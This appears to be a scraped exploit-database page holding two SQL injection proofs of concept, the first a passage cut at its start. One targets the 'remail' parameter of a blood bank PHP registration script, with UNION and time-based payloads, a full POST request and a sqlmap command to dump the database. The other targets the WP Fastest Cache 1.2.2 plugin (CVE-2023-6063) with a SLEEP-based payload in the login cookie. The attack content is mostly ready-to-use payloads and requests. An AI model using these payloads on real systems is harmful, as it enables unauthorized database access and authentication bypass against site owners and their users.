(SELECT 4449 FROM (SELECT(SLEEP(5)))eegb)-- Cuoy&rlogin=Login<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 7 columns<br /> Payload: remail=test@test&rpassword=test' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x6e686d776376736a706f47796d474a736a48566f72625a4e6d537247665a444f684154684b476d62,0x7178706271),NULL,NULL,NULL,NULL,NULL-- -&rlogin=Login<br />---<br /><br /><br />-------------------------------------------------------------------------------<br /><br /># Description:<br /><br />The lack of proper input validation and sanitization on the 'remail' parameter allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database.<br /><br />Vulnerable File: /receiverReg.php<br /><br />Parameter Name: remail<br /><br /># Proof of Concept:<br />----------------------<br /><br />1. Save the POST request of receiverReg.php to a request.txt file<br /><br />---<br />POST /bloodbank/file/receiverReg.php HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: multipart/form-data; boundary=---------------------------2653697510272605730288393868<br />Content-Length: 877<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/bloodbank/register.php<br />Cookie: PHPSESSID=<some-cookie-value><br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />-----------------------------2653697510272605730288393868<br />Content-Disposition: form-data; name="rname"<br /><br />test<br />-----------------------------2653697510272605730288393868<br />Content-Disposition: form-data; name="rbg"<br /><br />A+<br />-----------------------------2653697510272605730288393868<br />Content-Disposition: form-data; name="rcity"<br /><br />test<br />-----------------------------2653697510272605730288393868<br />Content-Disposition: form-data; name="rphone"<br /><br />05555555555<br />-----------------------------2653697510272605730288393868<br />Content-Disposition: form-data; name="remail"<br /><br />test@test<br />-----------------------------2653697510272605730288393868<br />Content-Disposition: form-data; name="rpassword"<br /><br />test123<br />-----------------------------2653697510272605730288393868<br />Content-Disposition: form-data; name="rregister"<br /><br />Register<br />-----------------------------2653697510272605730288393868--<br /><br />---<br /><br />2. Execute sqlmap using 'remail' parameter to retrieve the current database:<br /><br />sqlmap -r request.txt -p remail --risk 3 --level 3 --dbms mysql --batch --current-db<br /> <br /></code></pre>
<pre><code># Exploit Title: Unauthenticated SQL Injection in WP Fastest Cache 1.2.2<br /># Date: 14.11.2023<br /># Exploit Author: Meryem Taşkın<br /># Vendor Homepage: https://www.wpfastestcache.com/<br /># Software Link: https://wordpress.org/plugins/wp-fastest-cache/<br /># Version: WP Fastest Cache 1.2.2<br /># Tested on: WP Fastest Cache 1.2.2<br /># CVE: CVE-2023-6063<br /> <br />## Description<br />An SQL injection vulnerability exists in version 1.2.2 of the WP Fastest Cache plugin, allowing an attacker to trigger SQL queries on the system without authentication.<br /> <br />## Vuln Code<br /> <br />public function is_user_admin(){<br /> global $wpdb;<br /> foreach ((array)$_COOKIE as $cookie_key => $cookie_value){<br /> if(preg_match("/wordpress_logged_in/i", $cookie_key)){ <br /> $username = preg_replace("/^([^\|]+)\|.+/", "$1", $cookie_value); <br /> break;<br /> }<br /> }<br /> if(isset($username) && $username){ <br /> $res = $wpdb->get_var("SELECT `$wpdb->users`.`ID`, `$wpdb->users`.`user_login`, `$wpdb->usermeta`.`meta_key`, `$wpdb->usermeta`.`meta_value`<br /> FROM `$wpdb->users`<br /> INNER JOIN `$wpdb->usermeta`<br /> ON `$wpdb->users`.`user_login` = \"$username\" AND # $username varible is not escaped vulnerable to SQL injection<br /> .....<br /> <br />## Exploit<br />GET / HTTP/1.1<br />Cookie: wordpress_logged_in_1=%22%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29A%29%20AND%20%221%22%3D%221<br />Host: meryem.local<br /> <br />## Parameter: Cookie #1* ((custom) HEADER)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: wordpress_logged_in_dsadasdasd=" AND (SELECT 3809 FROM (SELECT(SLEEP(5)))RDVP) AND "HQDg"="HQDg<br />---<br /> <br />## References<br />- [WPScan Blog Post](https://wpscan.com/blog/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2/)<br />- [WPScan Vulnerability](https://wpscan.com/vulnerability/30a74105-8ade-4198-abe2-1c6f2967443e/)<br />- [CVE-2023-6063](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6063)<br /> <br />## Credits<br />- Original Researcher: Alex Sanford<br />- PoC: Meryem Taşkın<br /><br /></code></pre>
